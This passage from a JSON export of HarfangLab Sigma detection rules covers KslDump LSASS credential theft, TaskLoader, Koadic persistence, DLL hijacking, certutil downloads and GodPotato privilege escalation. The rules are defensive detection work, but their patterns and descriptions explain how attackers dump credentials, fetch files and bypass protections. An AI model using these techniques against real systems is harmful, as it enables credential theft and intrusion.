"0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "2319811a-6bed-4f5b-988c-74630cf93daf", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "critical", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T16:07:52.726835Z", "creation_date": "2026-03-23T11:45:34.623641Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.623645Z", "rule_level": "critical", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/andreisss/KslDump", "https://attack.mitre.org/techniques/T1003/001/" ], "name": "t1003_001_ksldump.yml", "content": "title: KslDump Technique Detected\nid: 2319811a-6bed-4f5b-988c-74630cf93daf\ndescription: |\n Detects the KslDump technique by monitoring suspicious modifications to the Ksl service's registry key.\n KslDump steals LSASS credentials from a PPL protected system using only Microsoft signed components.\n The attack simply redirects the Windows Defender service to an older, vulnerable copy of KslD.sys (drivers\\KslD.sys) that Microsoft left on disk.\n KslD.sys gives usermode code a direct path to MmCopyMemory() which allows attackers to bypass PPL and allows an arbitrary process to dump LSASS.\n The only gate to the device handle is a process name string stored in a registry key (AllowedProcessName).\n It is recommended to check the process that modified the registry value and the details for suspicious activities.\nreferences:\n - https://github.com/andreisss/KslDump\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2026/03/18\nmodified: 2026/03/23\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SYSTEM\\CurrentControlSet\\Services\\KslD\\AllowedProcessName'\n\n filter_legit_defender:\n Details:\n - '\\Device\\HarddiskVolume*\\ProgramData\\Microsoft\\Windows Defender\\Platform\\\\*\\MsMpEng.exe'\n - '\\Device\\HarddiskVolume*\\Program Files\\Windows Defender\\MsMpEng.exe'\n\n condition: selection and not 1 of filter_*\nlevel: critical\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "2319811a-6bed-4f5b-988c-74630cf93daf", "rule_name": "KslDump Technique Detected", "rule_description": "Detects the KslDump technique by monitoring suspicious modifications to the Ksl service's registry key.\nKslDump steals LSASS credentials from a PPL protected system using only Microsoft signed components.\nThe attack simply redirects the Windows Defender service to an older, vulnerable copy of KslD.sys (drivers\\KslD.sys) that Microsoft left on disk.\nKslD.sys gives usermode code a direct path to MmCopyMemory() which allows attackers to bypass PPL and allows an arbitrary process to dump LSASS.\nThe only gate to the device handle is a process name string stored in a registry key (AllowedProcessName).\nIt is recommended to check the process that modified the registry value and the details for suspicious activities.\n", "rule_creation_date": "2026-03-18", "rule_modified_date": "2026-03-23", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.credential_access" ], "rule_technique_tags": [ "attack.t1003.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "233bd602-6fe8-4484-991f-3b45ef546127", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.604263Z", "creation_date": "2026-03-23T11:45:34.604266Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.604274Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.file.net/process/sitool.exe.html", "https://attack.mitre.org/techniques/T1071/001/" ], "name": "t1071_001_sitool_malware.yml", "content": "title: TaskLoader Malware Execution\nid: 233bd602-6fe8-4484-991f-3b45ef546127\ndescription: |\n Detects the execution of the TaskLoader malware.\n TaskLoader is a malware that usually spreads through cracked software and contacts its C2 server for remote command execution.\n It is named TaskLoader as it utilizes scheduled tasks for persistence.\n The Sitool binary has also been associated with different malwares such as njRAT or Sabsik.\n It is recommended to examine this file further and look for persistence traces - especially scheduled tasks - on the infected computers.\nreferences:\n - https://www.file.net/process/sitool.exe.html\n - https://attack.mitre.org/techniques/T1071/001/\ndate: 2023/06/16\nmodified: 2025/03/07\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Malware.TaskLoader\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n OriginalFileName: 'sihost.exe'\n Image|endswith: '\\sitool.exe'\n\n condition: selection\nlevel: high\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "233bd602-6fe8-4484-991f-3b45ef546127", "rule_name": "TaskLoader Malware Execution", "rule_description": "Detects the execution of the TaskLoader malware.\nTaskLoader is a malware that usually spreads through cracked software and contacts its C2 server for remote command execution.\nIt is named TaskLoader as it utilizes scheduled tasks for persistence.\nThe Sitool binary has also been associated with different malwares such as njRAT or Sabsik.\nIt is recommended to examine this file further and look for persistence traces - especially scheduled tasks - on the infected computers.\n", "rule_creation_date": "2023-06-16", "rule_modified_date": "2025-03-07", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.command_and_control" ], "rule_technique_tags": [ "attack.t1071.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "23401fcc-11a5-4f33-b901-caca2fc67071", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.617355Z", "creation_date": "2026-03-23T11:45:34.617357Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.617361Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md", "https://attack.mitre.org/techniques/T1053/003/" ], "name": "t1053_003_cron_file_macos.yml", "content": "title: Crontab-Related Files Read (macOS)\nid: 23401fcc-11a5-4f33-b901-caca2fc67071\ndescription: |\n Detects the access to a cron job files without the use of crontab.\n An attacker could add a malicious cron job for persistence.\n It is recommended to check the content of the file in command-line for any unwanted lines.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.003/T1053.003.md\n - https://attack.mitre.org/techniques/T1053/003/\ndate: 2022/11/14\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1053.003\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Persistence\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image:\n - '/bin/sh'\n - '/bin/bash'\n - '/bin/csh'\n - '/bin/dash'\n - '/bin/ksh'\n - '/bin/tcsh'\n - '/bin/zsh'\n - '/bin/cat'\n - '/bin/echo'\n - '/bin/mv'\n - '/bin/cp'\n - '/usr/bin/less'\n - '/usr/bin/more'\n - '/usr/bin/vi'\n - '/usr/bin/vim'\n\n CommandLine|contains:\n # Match /etc/crontab and /etc/cron.daily and so on\n - '/etc/cron'\n # Alternative way to execute cron jobs via periodic\n - '/etc/periodic'\n - '/private/var/at'\n # symlink to /private/var/at\n - '/usr/lib/cron'\n\n exclusion_crontab_parent:\n ParentImage: '/usr/bin/crontab'\n\n # /bin/sh /etc/periodic/daily/199.clean-fax\n # /bin/sh - /etc/periodic/weekly/999.local\n # sh -c /etc/periodic/daily/999.local\n exclusion_periodic_exec:\n CommandLine|startswith:\n - '/bin/sh /etc/periodic'\n - '/bin/sh - /etc/periodic'\n - 'sh -c /etc/periodic'\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: strong", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "23401fcc-11a5-4f33-b901-caca2fc67071", "rule_name": "Crontab-Related Files Read (macOS)", "rule_description": "Detects the access to a cron job files without the use of crontab.\nAn attacker could add a malicious cron job for persistence.\nIt is recommended to check the content of the file in command-line for any unwanted lines.\n", "rule_creation_date": "2022-11-14", "rule_modified_date": "2025-01-30", "rule_os": "macos", "rule_status": null, "rule_tactic_tags": [ "attack.execution", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1053.003" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "23739d71-74b5-47ee-81b8-7aa4d21af3bc", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "moderate", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:35.294721Z", "creation_date": "2026-03-23T11:45:35.294724Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:35.294729Z", "rule_level": "medium", "rule_confidence": "moderate", "rule_confidence_override": null, "references": [ "https://attack.mitre.org/techniques/T1036/004/", "https://attack.mitre.org/techniques/T1036/005/", "https://attack.mitre.org/techniques/T1569/" ], "name": "t1036_004_systemd_service_manually_started.yml", "content": "title: System Service Manually Started\nid: 23739d71-74b5-47ee-81b8-7aa4d21af3bc\ndescription: |\n Detects a potential attempt to manually start a system service, instead of relying on the system standard service utilities.\n This might be an attempt to masquerade a custom binary as a system service or maliciously interfere with the way services are naturally handled.\n It is recommended to check if the binary is expected to be executed that way.\nreferences:\n - https://attack.mitre.org/techniques/T1036/004/\n - https://attack.mitre.org/techniques/T1036/005/\n - https://attack.mitre.org/techniques/T1569/\ndate: 2023/12/15\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1036.004\n - attack.t1036.005\n - attack.execution\n - attack.t1569\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.DefenseEvasion\n - classification.Linux.Behavior.Masquerading\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith:\n - '/sshd'\n - '/cron'\n - '/crond'\n - '/cupsd'\n ParentImage|contains: '?'\n\n filter_forks:\n ParentImage|endswith:\n - '/sshd'\n - '/cron'\n - '/crond'\n - '/cupsd'\n\n filter_systemd:\n - ParentImage:\n - '/lib/systemd/systemd'\n - '/usr/lib/systemd/systemd'\n - '/nix/store/*-systemd-*/lib/systemd/systemd'\n - GrandparentImage:\n - '/lib/systemd/systemd'\n - '/usr/lib/systemd/systemd'\n - '/nix/store/*-systemd-*/lib/systemd/systemd'\n\n exclusion_ossec:\n ParentImage: '/var/ossec/bin/wazuh-modulesd'\n\n exclusion_insights_client:\n CommandLine: '/usr/sbin/sshd -T'\n GrandparentCommandLine|startswith:\n - '/usr/bin/python /usr/lib/python*/site-packages/insights_client/run.py '\n - '/usr/libexec/platform-python /usr/lib/python*/site-packages/insights_client/run.py '\n\n exclusion_sshd_basic_args_1:\n Image|endswith: '/sshd'\n CommandLine|contains:\n - ' -t '\n - ' -h '\n - ' -v '\n\n exclusion_sshd_basic_args_2:\n Image|endswith: '/sshd'\n CommandLine|endswith:\n - ' -t'\n - ' -h'\n - ' -v'\n - ' -?'\n\n exclusion_puppet:\n - ParentImage: '/opt/puppetlabs/puppet/bin/ruby'\n - GrandparentImage: '/opt/puppetlabs/puppet/bin/ruby'\n\n exclusion_s6_supervise:\n ProcessParentImage|endswith:\n - '/s6-supervise'\n - '/s6-svscan '\n\n exclusion_qualys:\n ProcessAncestors|contains:\n - '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - '/usr/local/qualys/cloud-agent/bin/qualys-cloud-agent'\n\n exclusion_supervisord:\n ProcessParentCommandLine|contains: '/usr/bin/supervisord'\n\n exclusion_init:\n - ProcessParentCommandLine|contains: '/etc/init.d/'\n - ProcessGrandparentCommandLine|contains: '/sbin/init splash'\n - ProcessParentImage: '/sbin/init'\n - ProcessGrandparentImage: '/sbin/init'\n - ProcessParentCommandLine: '/sbin/init'\n - ProcessGrandparentCommandLine: '/sbin/init'\n\n exclusion_containerd:\n - ProcessAncestors|contains: '/containerd-shim-runc-v2'\n - ProcessGrandparentImage: '/sbin/docker-init'\n\n exclusion_runsvdir:\n - ProcessParentCommandLine|contains: 'runsvdir'\n - ProcessParentCommandLine|contains: 'runsvdir'\n\n exclusion_cups_snap:\n ProcessParentCommandLine: '/bin/sh /snap/cups/*/scripts/run-cupsd'\n\n exclusion_busybox:\n ProcessParentImage: '/bin/busybox'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "23739d71-74b5-47ee-81b8-7aa4d21af3bc", "rule_name": "System Service Manually Started", "rule_description": "Detects a potential attempt to manually start a system service, instead of relying on the system standard service utilities.\nThis might be an attempt to masquerade a custom binary as a system service or maliciously interfere with the way services are naturally handled.\nIt is recommended to check if the binary is expected to be executed that way.\n", "rule_creation_date": "2023-12-15", "rule_modified_date": "2026-02-11", "rule_os": "linux", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.execution" ], "rule_technique_tags": [ "attack.t1036.004", "attack.t1036.005", "attack.t1569" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "23ae76e3-7f36-4f3d-986c-cd449deeb266", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "medium", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.091265Z", "creation_date": "2026-03-23T11:45:34.091267Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.091271Z", "rule_level": "medium", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/offsecginger/koadic", "https://attack.mitre.org/software/S0250/", "https://attack.mitre.org/techniques/T1547/" ], "name": "t1547_koadic_script_auto_run.yml", "content": "title: Koadic Auto Run Script Created\nid: 23ae76e3-7f36-4f3d-986c-cd449deeb266\ndescription: |\n Detects the creation of a .HTA file used to reconnect a system infected by Koadic back to its C2 server.\n Koadic is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub.\n It is recommended to analyze the process responsible for creation of this file to look for other malicious actions, as well as to investigate suspicious network activity from a potential Koadic beacon.\nreferences:\n - https://github.com/offsecginger/koadic\n - https://attack.mitre.org/software/S0250/\n - https://attack.mitre.org/techniques/T1547/\ndate: 2021/02/11\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1547\n - attack.s0250\n - classification.Windows.Source.Filesystem\n - classification.Windows.Framework.Koadic\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: filesystem_create\ndetection:\n selection:\n Path|endswith:\n - '\\AppData\\Roaming\\\\??????????.hta'\n - '\\ProgramData\\\\??????????.hta'\n\n condition: selection\nlevel: medium\n# level: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "23ae76e3-7f36-4f3d-986c-cd449deeb266", "rule_name": "Koadic Auto Run Script Created", "rule_description": "Detects the creation of a .HTA file used to reconnect a system infected by Koadic back to its C2 server.\nKoadic is a Windows post-exploitation framework and penetration testing tool that is publicly available on GitHub.\nIt is recommended to analyze the process responsible for creation of this file to look for other malicious actions, as well as to investigate suspicious network activity from a potential Koadic beacon.\n", "rule_creation_date": "2021-02-11", "rule_modified_date": "2025-01-30", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1547" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "23c070c2-f80e-42b8-a453-5cda9de44edb", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.098949Z", "creation_date": "2026-03-23T11:45:34.098951Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.098961Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows", "https://github.com/xforcered/WFH", "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/", "https://attack.mitre.org/techniques/T1574/001/" ], "name": "t1574_001_dll_hijacking_lockscreencontentserver.yml", "content": "title: DLL Hijacking via lockscreencontentserver.exe\nid: 23c070c2-f80e-42b8-a453-5cda9de44edb\ndescription: |\n Detects potential Windows DLL Hijacking via lockscreencontentserver.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'lockscreencontentserver.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\duser.dll'\n - '\\dwmapi.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "23c070c2-f80e-42b8-a453-5cda9de44edb", "rule_name": "DLL Hijacking via lockscreencontentserver.exe", "rule_description": "Detects potential Windows DLL Hijacking via lockscreencontentserver.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n", "rule_creation_date": "2021-12-10", "rule_modified_date": "2025-07-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion", "attack.persistence", "attack.privilege_escalation" ], "rule_technique_tags": [ "attack.t1574.001" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "23c4819b-cfa3-4862-a35c-8735c0ec96a4", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.073715Z", "creation_date": "2026-03-23T11:45:34.073717Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.073721Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", "https://attack.mitre.org/techniques/T1105/" ], "name": "t1105_certutil_download_usage.yml", "content": "title: File Downloaded via Certutil\nid: 23c4819b-cfa3-4862-a35c-8735c0ec96a4\ndescription: |\n Detects usage of certutil.exe to download a file from a given URL.\n Adversaries may transfer tools or other files from an external system into a compromised environment through Certutil to evade detection.\n It is recommended to analyze the parent process and to downloaded file to look for malicious content or actions.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Certutil/\n - https://attack.mitre.org/techniques/T1105/\ndate: 2021/05/26\nmodified: 2025/02/04\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1105\n - attack.s0160\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Certutil\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_common_1:\n - Image|endswith: '\\certutil.exe'\n # Renamed binaries\n - OriginalFileName: 'CertUtil.exe'\n\n selection_common_2:\n CommandLine|contains:\n - ' -split '\n - ' /split '\n\n selection_common_3:\n CommandLine|contains:\n - ' -f '\n - ' /f '\n\n selection_variant_urlcache:\n CommandLine|contains:\n - ' -urlcache '\n - ' /urlcache '\n\n selection_variant_verifyctl:\n CommandLine|contains:\n - ' -verifyctl '\n - ' /verifyctl '\n\n condition: all of selection_common_* and 1 of selection_variant_*\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "23c4819b-cfa3-4862-a35c-8735c0ec96a4", "rule_name": "File Downloaded via Certutil", "rule_description": "Detects usage of certutil.exe to download a file from a given URL.\nAdversaries may transfer tools or other files from an external system into a compromised environment through Certutil to evade detection.\nIt is recommended to analyze the parent process and to downloaded file to look for malicious content or actions.\n", "rule_creation_date": "2021-05-26", "rule_modified_date": "2025-02-04", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.defense_evasion" ], "rule_technique_tags": [ "attack.t1105" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "23c6fc5b-6b2b-4ae3-8b4c-fbac861ae8b5", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.072727Z", "creation_date": "2026-03-23T11:45:34.072730Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.072734Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://github.com/BeichenDream/GodPotato", "https://attack.mitre.org/techniques/T1021/003/" ], "name": "t1021_003_suspicious_process_via_dcom.yml", "content": "title: Suspicious Process Launched via DCOM\nid: 23c6fc5b-6b2b-4ae3-8b4c-fbac861ae8b5\ndescription: |\n Detects a suspicious process launch with token impersonation via DCOM that can be the result of privilege escalation.\n The GodPotato hacktool is known to use this method.\n It is recommended to investigate the launched process to determine its legitimacy.\nreferences:\n - https://github.com/BeichenDream/GodPotato\n - https://attack.mitre.org/techniques/T1021/003/\ndate: 2023/10/27\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage: '?:\\Windows\\System32\\svchost.exe'\n ParentCommandLine|contains: 'seclogon'\n UserSID: 'S-1-5-20'\n\n condition: selection\nlevel: high\nconfidence: strong\n", "block_on_agent": false, "quarantine_on_agent": false, "rule_level_override": null, "rule_id": "23c6fc5b-6b2b-4ae3-8b4c-fbac861ae8b5", "rule_name": "Suspicious Process Launched via DCOM", "rule_description": "Detects a suspicious process launch with token impersonation via DCOM that can be the result of privilege escalation.\nThe GodPotato hacktool is known to use this method.\nIt is recommended to investigate the launched process to determine its legitimacy.\n", "rule_creation_date": "2023-10-27", "rule_modified_date": "2025-04-11", "rule_os": "windows", "rule_status": null, "rule_tactic_tags": [ "attack.lateral_movement" ], "rule_technique_tags": [ "attack.t1021.003" ], "warnings": null, "errors": null, "declared_in": null, "source": "0950c540-b155-4054-9b93-8fb2888de6ed" } { "id": "23ec89c2-af05-41a4-aa3a-a08516d8e33c", "test_maturity_current_count": 0, "test_maturity_delay": 7, "test_maturity_threshold": 10, "global_state": "alert", "effective_state": "alert", "rule_effective_level": "high", "rule_effective_confidence": "strong", "alert_count": 0, "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", "rule_level_overridden": false, "whitelist_count": 0, "last_modifier": { "id": 1, "username": "system_supervisor" }, "endpoint_detection": true, "backend_detection": false, "origin_stack": { "id": "b8e2fe4fc90e4d08", "name": null, "is_current": false, "is_supervisor": true, "is_tenant": false }, "tenant": "b8e2fe4fc90e4d08", "rule_is_depended_on": [], "rule_type": "sigma_rule", "origin_stack_id": "b8e2fe4fc90e4d08", "last_update": "2026-03-23T11:45:34.093309Z", "creation_date": "2026-03-23T11:45:34.093311Z", "enabled": true, "hl_status": "stable", "hl_testing_start_time": "2026-03-23T11:45:34.093316Z", "rule_level": "high", "rule_confidence": "strong", "rule_confidence_override": null, "references": [ "https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html", "https://attack.mitre.org/techniques/T1548/002/" ], "name": "t1548_002_uac_bypass_consent.yml", "content": "title: UAC Bypass Executed via consent\nid: 23ec89c2-af05-41a4-aa3a-a08516d8e33c\ndescription: |\n Detects an unsigned DLL being loaded by consent.exe.\n This may be indicative of a technique used for circumventing User Account Control (UAC) to escalate privileges.\n Windows User Account Control allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate the behavior of consent.exe and to identify the process responsible for the DLL file creation.\nreferences:\n - https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html\n - 